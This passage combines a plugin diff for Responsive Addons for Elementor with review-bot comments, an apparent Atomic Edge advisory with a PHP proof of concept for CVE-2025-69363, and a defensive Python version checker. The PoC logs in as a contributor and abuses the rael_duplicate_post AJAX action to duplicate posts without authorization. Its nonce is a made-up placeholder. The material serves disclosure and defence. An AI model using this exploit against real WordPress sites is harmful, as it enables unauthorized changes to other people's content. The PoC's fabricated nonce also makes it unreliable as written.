+		);
+
+		$this->add_responsive_control(
+			'review_padding',
+			[
+				'label' => __( 'Review Padding', 'responsive-addons-for-elementor' ),
+				'type'  => Controls_Manager::DIMENSIONS,
+				'selectors' => [
+					'{{WRAPPER}} .rael-rating-stars' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+				],
+			]
+		);
+
+		$this->add_responsive_control(
+			'review_margin',
+			[
+				'label' => __( 'Review Margin', 'responsive-addons-for-elementor' ),
+				'type'  => Controls_Manager::DIMENSIONS,
+				'selectors' => [
+					'{{WRAPPER}} .rael-rating-stars' => 'margin: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+				],
+			]
+		);

 		$this->end_controls_section();

+
 		$this->start_controls_section(
 			'section_navigation',
 			array(
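Review bot: the new `section_rating_style` controls use short array syntax (`[ ... ]`) while the rest of the file, including the other controls added in this same patch, uses `array( ... )`; the `rating_icon_size` default mixes both and stores the size as the string `'17'` where `rating_item_margin_right` uses the integer `5`. Use `array()` and integer sizes throughout, and drop the doubled blank lines around the added `end_controls_section()` calls.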
@@ -1106,21 +1243,54 @@
 				),
 			)
 		);
-
 		$this->add_control(
+			'pagination_style',
+			array(
+				'label'       => __( 'Choose Dots Style', 'responsive-addons-for-elementor' ),
+				'type'        => Controls_Manager::SELECT,
+				'label_block' => true,
+				'default'     => 'solid_circle',
+				'options'     => array(
+					'solid_circle'    => __( 'Solid Circle', 'responsive-addons-for-elementor' ),
+					'outline_circle'  => __( 'Outlined Circle', 'responsive-addons-for-elementor' ),
+					'bars'  => __( 'Bars', 'responsive-addons-for-elementor' ),
+				),
+				'prefix_class' => 'rael-pagination-style-',
+				'condition' => array(
+					'pagination' => 'bullets',
+				),
+			)
+		);
+
+			$this->add_control(
 			'pagination_size',
 			array(
 				'label'     => __( 'Size', 'responsive-addons-for-elementor' ),
 				'type'      => Controls_Manager::SLIDER,
 				'range'     => array(
 					'px' => array(
-						'max' => 20,
+						'max' => 20,
 					),
 				),
+				'default'   => array(
+					'size' => 13,
+					'unit' => 'px',
+				),
 				'selectors' => array(
-					'{{WRAPPER}} .swiper-pagination-bullet' => 'height: {{SIZE}}{{UNIT}}; width: {{SIZE}}{{UNIT}}',
-					'{{WRAPPER}} .swiper-horizontal .swiper-pagination-progressbar' => 'height: {{SIZE}}{{UNIT}}',
-					'{{WRAPPER}} .swiper-pagination-fraction' => 'font-size: {{SIZE}}{{UNIT}}',
+					'{{WRAPPER}}.rael-pagination-style-solid_circle .swiper-pagination-bullet' =>
+						'height: {{SIZE}}{{UNIT}} !important; width: {{SIZE}}{{UNIT}} !important; border-radius: 50% !important;',
+
+					'{{WRAPPER}}.rael-pagination-style-outline_circle .swiper-pagination-bullet' =>
+						'height: {{SIZE}}{{UNIT}} !important; width: {{SIZE}}{{UNIT}} !important; border-radius: 50% !important;',
+
+					'{{WRAPPER}}.rael-pagination-style-bars .swiper-pagination-bullet' =>
+						'width: {{SIZE}}{{UNIT}} !important; height: 5px !important; border-radius: 10px !important;',
+
+					'{{WRAPPER}} .swiper-horizontal .swiper-pagination-progressbar' =>
+						'height: {{SIZE}}{{UNIT}} !important;',
+
+					'{{WRAPPER}} .swiper-pagination-fraction' =>
+						'font-size: {{SIZE}}{{UNIT}} !important;',
 				),
 				'condition' => array(
 					'pagination!' => '',
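Review bot: every declaration in the new `pagination_size` selectors carries `!important`, which overrides theme or custom CSS that could previously restyle the bullets, and the `bars` style hard-codes `height: 5px` so the Size slider only changes the width there. Drop `!important` and rely on the added specificity of `{{WRAPPER}}.rael-pagination-style-*`. The `'max' => 20,` line and the extra indent on `$this->add_control(` are whitespace-only changes that should be left out of the patch.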
@@ -1128,14 +1298,27 @@
 			)
 		);

+
 		$this->add_control(
 			'pagination_color',
 			array(
 				'label'     => __( 'Color', 'responsive-addons-for-elementor' ),
 				'type'      => Controls_Manager::COLOR,
+				'default'   => '#cccccc',
 				'selectors' => array(
 					'{{WRAPPER}} .swiper-pagination-bullet:not(.swiper-pagination-bullet-active), {{WRAPPER}} .swiper-pagination-progressbar' => 'background-color: {{VALUE}}; opacity: 1;',
 					'{{WRAPPER}} .swiper-pagination-fraction' => 'color: {{VALUE}}',
+					/* Solid Circle – inactive bullets */
+					'{{WRAPPER}}.rael-pagination-style-solid_circle .swiper-pagination-bullet:not(.swiper-pagination-bullet-active)' =>
+						'background-color: {{VALUE}}; opacity: 1;',
+
+					/* Outline Circle – inactive bullets */
+					'{{WRAPPER}}.rael-pagination-style-outline_circle .swiper-pagination-bullet:not(.swiper-pagination-bullet-active)' =>
+						'background-color: transparent; border: 2px solid {{VALUE}}; opacity: 1;',
+
+					/* Bars – inactive bars */
+					'{{WRAPPER}}.rael-pagination-style-bars .swiper-pagination-bullet:not(.swiper-pagination-bullet-active)' =>
+						'background-color: {{VALUE}};',
 				),
 				'condition' => array(
 					'pagination!' => '',
@@ -1148,6 +1331,7 @@
 			array(
 				'label'     => __( 'Active Dot Color', 'responsive-addons-for-elementor' ),
 				'type'      => Controls_Manager::COLOR,
+				'default'   => '#000000',
 				'selectors' => array(
 					'{{WRAPPER}} .swiper-pagination-bullet-active' => 'background-color: {{VALUE}}',
 				),
@@ -1410,7 +1594,8 @@
 				</div>
 				<?php if ( 1 < $slides_count ) : ?>
 					<?php if ( $settings['pagination'] ) : ?>
-						<div class="swiper-pagination"></div>
+
+							<div class="swiper-pagination"></div>
 					<?php endif; ?>
 					<?php if ( $settings['show_arrows'] ) : ?>
 						<?php
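Review bot: this hunk changes only whitespace. The `<div class="swiper-pagination"></div>` line is re-indented one level deeper than the surrounding `<?php if ... endif; ?>` block and a blank line is added before it, with no change to the markup. Reverting it keeps the diff limited to functional changes.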
@@ -1516,6 +1701,27 @@
 					?>
 				</div>
 				<div class="responsive-testimonial__content">
+					<?php
+						if($settings['enable_rating'] == 'yes') {
+							$rating = intval( $slide['testimonial_rating'] );
+
+							echo '<div class="rael-rating-stars">';
+
+							// filled stars
+							for ( $i = 0; $i < $rating; $i++ ) {
+								echo '<i class="fas fa-star"></i>';
+							}
+
+							// outlined stars
+							for ( $i = $rating; $i < 5; $i++ ) {
+								echo '<i class="far fa-star"></i>';
+							}
+
+							echo '</div>';
+						}
+
+					?>
+
 					<div class="responsive-testimonial__text">
 						<?php echo esc_html( $slide['content'] ); ?>
 					</div>
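Review bot: in the added rating block, `intval( $slide['testimonial_rating'] )` is used as a loop bound without range checking, so a stored value above 5 prints more than five filled stars and a negative value prints more than five outlined ones. Clamp it, for example `$rating = min( 5, max( 0, intval( ... ) ) );`. Both `$settings['enable_rating']` and `$slide['testimonial_rating']` are read without an `isset()`/`empty()` guard, which raises notices for slides saved before this control existed, and the comparison should be strict (`'yes' === $settings['enable_rating']`) to match WordPress coding standards. The echoed markup is static, so no escaping is missing here.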
--- a/responsive-addons-for-elementor/responsive-addons-for-elementor.php
+++ b/responsive-addons-for-elementor/responsive-addons-for-elementor.php
@@ -3,7 +3,7 @@
  * Plugin Name: Responsive Addons for Elementor
  * Plugin URI:  https://cyberchimps.com/responsive-addons-for-elementor/
  * Description: Responsive Addons for Elementor plugin adds Elementor widgets and seamlessly integrates with any Elementor Package (Free, Pro). It is compatible with all popular WordPress themes.
- * Version:     2.0.8
+ * Version:     2.0.9
  * Author:      Cyberchimps.com
  * Author URI:  https://cyberchimps.com/responsive-addons-for-elementor/
  * License:     GPL v2 or later
@@ -22,7 +22,7 @@
 	exit;
 }

-define( 'RAEL_VER', '2.0.8' );
+define( 'RAEL_VER', '2.0.9' );
 define( 'RAEL_DIR', plugin_dir_path( __FILE__ ) );
 define( 'RAEL_URL', plugins_url( '/', __FILE__ ) );
 define( 'RAEL_PATH', plugin_basename( __FILE__ ) );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-69363 - Responsive Addons for Elementor <= 2.0.8 - Missing Authorization

<?php
/**
 * Proof of Concept for CVE-2025-69363
 * Requires Contributor-level WordPress credentials
 * Demonstrates unauthorized post duplication via AJAX endpoint
 */

$target_url = 'https://vulnerable-site.com';
$username = 'contributor_user';
$password = 'contributor_password';
$target_post_id = 123; // ID of post to duplicate (should not be editable by contributor)

// Initialize cURL session for WordPress login
$ch = curl_init();

// Step 1: Get login page to retrieve nonce
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$response = curl_exec($ch);

// Extract login nonce (simplified - real implementation would parse HTML)
// WordPress uses 'log' and 'pwd' parameters for login

// Step 2: Authenticate to WordPress
$post_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 3: Exploit missing authorization via AJAX endpoint
// The vulnerable endpoint is /wp-admin/admin-ajax.php with action=rael_duplicate_post
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Create nonce for the duplicate action (required by the plugin)
// In real exploitation, the attacker would obtain this nonce from the admin interface
// or from the rae_get_duplicate_link function output
$nonce = 'rael_duplicate_post_' . $target_post_id;

$exploit_params = [
    'action' => 'rael_duplicate_post',
    'post' => $target_post_id,
    '_wpnonce' => $nonce
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $exploit_params);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
$response = curl_exec($ch);

// Step 4: Check if duplication was successful
if (strpos($response, 'admin.php?post=') !== false || strpos($response, 'post duplicated') !== false) {
    echo "[SUCCESS] Post #$target_post_id duplicated without proper authorization\n";
    echo "Response: " . htmlspecialchars(substr($response, 0, 500)) . "\n";
} else {
    echo "[FAILED] Exploit attempt blocked or failed\n";
    echo "Response: " . htmlspecialchars(substr($response, 0, 500)) . "\n";
}

// Alternative exploitation via bulk actions (admin interface)
echo "\nAlternative method: Bulk action duplication via /wp-admin/edit.php\n";
echo "Contributor users can access bulk actions menu and select 'Duplicate'\n";
echo "for posts they should not have permission to edit.\n";

curl_close($ch);
?>
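For defenders, the quickest check is whether an installation is still on a release before 2.0.9. The following Python script is an added example, not part of the Atomic Edge page or the plugin: it reads the plugin's main file and compares the `Version:` header and the `RAEL_VER` define shown in the diff against the patched version. The sample strings are constructed, and the status names are this example's own.

```python
import re
import sys

PATCHED = (2, 0, 9)  # first fixed release named in the advisory

# Patterns follow the two version lines visible in the diff of the main file.
HEADER_RE = re.compile(r"^\s*\*\s*Version:\s*(\d+(?:\.\d+)*)\s*$", re.M)
DEFINE_RE = re.compile(r"define\(\s*'RAEL_VER'\s*,\s*'(\d+(?:\.\d+)*)'\s*\)")

# Constructed samples modelled on the header lines shown in the diff.
SAMPLE_OLD = "<?php\n/**\n * Version:     2.0.8\n */\ndefine( 'RAEL_VER', '2.0.8' );\n"
SAMPLE_NEW = SAMPLE_OLD.replace("2.0.8", "2.0.9")
SAMPLE_HALF = SAMPLE_OLD.replace("Version:     2.0.8", "Version:     2.0.9")


def parse_version(text):
    """Turn '2.0.8' into (2, 0, 8), padded to three parts."""
    parts = [int(p) for p in text.split(".")]
    return tuple(parts + [0] * (3 - len(parts)))


def assess(source):
    """Return (status, header_version, define_version) for the main plugin file."""
    header = HEADER_RE.search(source)
    define = DEFINE_RE.search(source)
    hv = header.group(1) if header else None
    dv = define.group(1) if define else None
    found = [v for v in (hv, dv) if v]
    if not found:
        return ("unknown", None, None)
    # Judge by the lowest version found so a half-applied update stays flagged.
    lowest = min(parse_version(v) for v in found)
    status = "vulnerable" if lowest < PATCHED else "patched"
    if hv and dv and hv != dv:
        status += "-mismatch"
    return (status, hv, dv)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            print(assess(fh.read()))
    else:
        for name, sample in (("old", SAMPLE_OLD), ("new", SAMPLE_NEW), ("half", SAMPLE_HALF)):
            print(name, assess(sample))
```

A `-mismatch` status means the header and the define disagree, which usually points to an interrupted or partial update and is worth a manual look.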
